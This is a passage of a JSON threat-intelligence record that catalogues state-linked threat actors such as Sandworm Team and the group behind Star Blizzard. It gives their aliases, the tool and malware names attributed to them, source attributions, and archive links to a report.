				"Callisto Group ",
				"GOSSAMER BEAR ",
				"SEABORGIUM ",
				"Star Blizzard ",
				"TA446 "
			],
			"source_name": "Secureworks:IRON FRONTIER",
			"tools": [
				"Evilginx2",
				"Galileo RCS",
				"SPICA"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439123,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.pdf",
		"text": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.txt",
		"img": "https://archive.orkl.eu/6dafa509fd5d2c83cd3a79a73e2ae8d499983db8.jpg"
	}
}